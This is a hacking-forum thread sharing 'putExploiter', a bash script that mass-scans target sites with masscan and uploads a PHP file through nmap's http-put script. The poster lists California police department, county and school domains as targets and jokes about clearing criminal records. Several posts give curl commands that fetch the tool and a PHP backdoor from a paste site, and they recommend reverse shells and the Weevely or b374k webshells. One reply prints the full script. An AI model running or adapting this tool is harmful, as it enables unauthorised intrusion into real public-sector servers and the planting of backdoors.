putExploiter
#1
#################################Usage >>>
Code:
root@tor:/opt# bash putExploiter calPigs
[ PUT - fileUploader ]
[ ifsoe.One_818x909 ]
calPigs
<<<< ########################################

calPigs = List of targetSites. Only include the site ( Ex. google.com )
        >>One line x One Site<<
____________________________________
Here is the content of my file
State of California's Police Dept's

Code:
root@tor:/opt# cat -n calPigs
   380    www.vpd.ci.visalia.ca.us
   381    www.walnutvalley.k12.ca.us
   382    www.wcpd.org
   383    www.wehosheriff.com
   384    www.west.net
   385    www.whittierpd.org
   386    www.wvmccd.cc.ca.us
   387    www.yolocounty.org
   388    www.yucaipa.org
   389    www1.ridgecrest.ca.us
   390    www2.ucsc.edu
   391    wwwsa.csuhayward.edu
____________________________________

When a website is no longer available You'll see :
Code:
ping: ci.sonora.ca.us: Name or service not known

Keep your List of targets under 5 for a shorter Run.
Most importantly, Do some proper recon so that you
can sort your targets and remove those which lead to
Direct-Waf ( akamai,cloudflare,bigip etc....) as
this is a "WASTE of TIME"...

run this to download + enter your targetsList
Code:
curl -o putExploiter "https://paste.sh/Ph9MBSfv#Q1t3dWT1MMNsRKA-O29PuuEW"
echo "Like This -> bash putExploiter <targetsFile>"

Upon Successfully Exploiting Visit The URL That Includes The Directory "/666.php"
You Are Able To Upload Local Files Into The Remote Target Site. I recommend maybe >>> A reverseShell!....

keep in mind Target must have PUT option enabled to be considered "Possibly-Vuln"
Enjoy @GreySec...
Reply
#2
Cool exploit! Never heard of it before. Kind of reminds me of the WebDav methods.
Thanks for sharing! I'll give this a test-run.
Reply
#3
(12-31-2017, 02:01 AM)Insider Wrote: Cool exploit! Never heard of it before. Kind of reminds me of the WebDav methods.
Thanks for sharing! I'll give this a test-run.

Yeah pretty much identical to webdav Put Exploitation. Only difference is that I noticed it worked on over 50 diffferent Police Dept<<<<(o.0)
Any one need their record cleared?....


@insider try uploading this one right here its pretty clean
Code:
curl -o br.php https://paste.sh/EgdolA4z#f9-xhrx_IRdT9vNM4-sdlhLQ
Reply
#4
I'll look into this and give ya good review after I've attempted it my friend, thanks again for the share!
Reply
#5
Yep, I think I spotted a bug but didnt have time to check it out. Ill include the fixed version when im done with my familly thing here for new years..
Reply
#6
(12-31-2017, 08:34 PM)blahblahblah Wrote: Yep, I think I spotted a bug but didnt have time to check it out. Ill include the fixed version when im done with my familly thing here for new years..

Not a problem at all, Happy New Year and enjoy your time and release it when you get the chance my friend!
Reply
#7
Servers accepting PUT requests is indeed a common web vulnerability. Some kind of automation tool would be amazing to exploit this more easily.

Did you code this yourself? I'm wondering why you uploaded it to a pastebin, it's only 35 lines:

Code:
#!/bin/bash
echo "[ PUT - fileUploader ]"
echo "[ ifsoe.One_818x909 ]"

sleep 4

echo $1
for i in $(cat $1); do
  ping -c1 $i >> out &
wait
done;
cat out | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > Out
cat Out | cut -f2 -d: | cut -f1-3 -d. > ip
for i in $(cat ip); do
  echo "${i}.1-${i}.200" > TargetIPs
wait
done;
masscan --max-rate=10000 -Pn -p80 -iL TargetIPs --open --output-file ips
cat ips | egrep -o '([0-9]{1,3}\.){3}[0-9]{1,3}' > Results  
cat Results
rm -r ips
rm -r ip
rm -r Out
rm -r out
for i in $(cat Results); do
  nmap -sV -p 80 $i --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put &
  nmap -sV -p 443 $i --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put &
  nmap -sV -p 8080 $i --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put &
  nmap -sV -p 8443 $i --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put &
wait
done;
cat put
rm -r targetIPs
rm -r Results
exit 0

You're also using masscan to scan port 80 but then using nmap's PUT script on ports 443,8080,8443? That's a little confusing to me. Assuming masscan is only validating open ports (which nmap can do), why not just do it all on one line?

Code:
nmap -T5 -sV -p 80,443,8080,8443 $i --script http-put --script-args http-put.url='/666.php',http-put.file='666.txt' -oG put &

You should also include -T5 to increase the speed of the scan. Also, what's "666.txt"? You might be interested in this github project. It's an "administration tool" but we can use it for malicious purposes. Another useful tool is Weevely, which I'm betting has been shared on this forum several times already. If you manage to PUT a weevely or b374k payload on a vulnerable server running PHP, it's pretty much game over for the site.

On a more technical note, your shell script could use some variables and arrays which would help with writing and removing data to the disk between commands. Your script *works*, it gets the job done, but using variables is just a more elegant way of doing things. I might be willing to demonstrate a cleaner version of the script if you're interested.
Reply
#8
be my guest, this was more of a poc rather then a full blown script..
curl -o br.php https://paste.sh/EgdolA4z#f9-xhrx_IRdT9vNM4-sdlhLQ <--- 666.txt

Yeah I aware of those tools, the masscan is obvious. "mass" scan ran through port 80's faster then a -T5 nmap. validating only --open. The reason fro nmap running on those ports aftwerwards without -T5 is because PUT is available on those ports as well also running on -t5 you get false negatives. "Upload not successfull" type msg.

if it ended up on a pastebin its beacuse i didnt want to keep it on my hardrive. sharing purposes only...
Reply